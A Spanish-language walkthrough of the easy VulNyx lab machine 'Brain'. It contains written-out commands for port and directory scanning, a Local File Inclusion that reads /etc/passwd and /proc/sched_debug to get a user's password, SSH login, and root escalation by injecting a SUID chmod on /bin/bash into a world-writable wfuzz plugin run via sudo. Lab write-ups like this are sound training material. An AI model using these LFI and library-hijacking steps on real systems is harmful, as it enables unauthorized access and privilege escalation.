VulNyx - Brain
Information
Brain es una máquina virtual vulnerable Linux de dificultad fácil de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.93
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 18:53 CEST
Nmap scan report for 192.168.1.93
Host is up (0.000069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
❯ nmap -sVC -p22,80 192.168.1.93
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 18:54 CEST
Nmap scan report for 192.168.1.93
Host is up (0.00046s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 32:95:f9:20:44:d7:a1:d1:80:a8:d6:95:91:d5:1e:da (RSA)
| 256 07:e7:24:38:1d:64:f6:88:9a:71:23:79:b8:d8:e6:57 (ECDSA)
|_ 256 58:a6:da:1e:0f:89:42:2b:ba:de:00:fc:71:78:3d:56 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
Shell (ben)
80/TCP (HTTP)
Site
El contenido de la página parece la salida del archivo sched_debug
Directory Brute Force
Únicamente obtengo index.php, que corresponde a la página actual en la que me encuentro
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.93/ -x html,php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.93/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 361]
Progress: 882180 / 882184 (100.00%)
===============================================================
Finished
===============================================================
Parameter Brute Force
Encuentro el parámetro include vulnerable a Local File Inclusion (LFI), ya que me permite apuntar al archivo /etc/passwd
❯ wfuzz -c --hc=404 -w /opt/common.txt -u "http://192.168.1.93/index.php?FUZZ=/etc/passwd" --hh=361
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.93/index.php?FUZZ=/etc/passwd
Total requests: 4746
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002202: 200 33 L 64 W 1750 Ch "include"
Total time: 2.133096
Processed Requests: 4746
Filtered Requests: 4745
Requests/sec.: 2224.934
Local File Inclusion (LFI)
Consigo leer el contenido del archivo /etc/passwd y enumero a los usuarios ben y root
❯ curl -sX GET "http://192.168.1.93/index.php?include=/etc/passwd" |grep "sh$"
root:x:0:0:root:/root:/bin/bash
ben:x:1000:1000:ben,,,:/home/ben:/bin/bash
Hago caso a la pista y apunto al archivo sched_debud, filtro por el usuario enumerado y encuentro las credenciales de ben
❯ curl -sX GET "http://192.168.1.93/index.php?include=/proc/sched_debug" |grep ben
S ben:B3nP4zz 375 1257.728035 25 120 0.000000 0.989759 0.000000 0 0 /
22/TCP (SSH)
Accedo al sistema como usuario ben con las credenciales obtenidas
❯ sshpass -p 'B3nP4zz' ssh ben@192.168.1.93 -o StrictHostKeyChecking=no
Linux brain 4.19.0-23-amd64 #1 SMP Debian 4.19.269-1 (2022-12-20) x86_64
ben@brain:~$ id ; hostname
uid=1000(ben) gid=1000(ben) grupos=1000(ben)
brain
Privilege Escalation
Enumeration
Sudo
El usuario ben puede ejecutar como root el binario wfuzz con sudo
ben@brain:~$ sudo -l
Matching Defaults entries for ben on Brain:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ben may run the following commands on Brain:
(root) NOPASSWD: /usr/bin/wfuzz
Writable Files
Dispongo de permisos para escribir sobre el módulo range.py de wfuzz
ben@brain:~$ find / -writable 2>/dev/null |grep -vE "proc|sys|tmp|run|dev|home|var"
/usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
ben@brain:~$ ls -l /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
-rwxrwxrwx 1 root root 1519 abr 19 2023 /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
Revisando el help veo que con el parámetro -z se pueden cargar módulos
-z payload : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
Abuse
Python Library Hijacking
Agrego permisos 4755 (SUID) a la /bin/bash en el módulo range.py
ben@brain:~$ echo -e 'import os\nos.system("chmod 4755 /bin/bash")' >> /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
Ejecuto wfuzz con sudo y al cargar el módulo range.py me convierto en usuario root
ben@brain:~$ sudo -u root /usr/bin/wfuzz -c -z range,1-65535 -u http://127.0.0.1/FUZZ
ben@brain:~$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1168776 abr 18 2019 /bin/bash
ben@brain:~$ /bin/bash -pi
bash-5.0# id ; hostname
uid=1000(ben) gid=1000(ben) euid=0(root) grupos=1000(ben)
brain
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
bash-5.0# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
08c3****************************
4be6****************************
Hasta aquí la resolución de la máquina Brain.
Happy Hacking!